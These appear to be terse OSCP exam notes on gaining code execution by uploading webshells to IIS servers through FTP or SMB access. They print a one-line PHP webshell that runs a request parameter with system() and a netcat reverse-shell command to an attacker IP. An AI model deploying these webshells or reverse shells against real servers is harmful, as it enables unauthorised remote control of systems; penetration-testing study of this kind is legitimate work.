O
O
OSCP Notes
Search…
⌃K

uploading a file to IIS

if you have a FTP uploading access, try uploading different types of files.
  • ASP, ASPX
git clone it and grep the extension (grep asp$)
and rename the file to whatever.asp
  • if it gives 500 error , try different webshells -> nishang ps1 -> reverse shell.
IIS server open and you have a smb share access on the web root.
try to create a web shell and upload it > access it!
<?php system($REQUEST['ippsec']) ?>
RCE confirmed?
Uploading nc.exe (googling nc64.exe) tends to get a stable shell on windows!
nc.exe attacker_IP 9001 -e powershell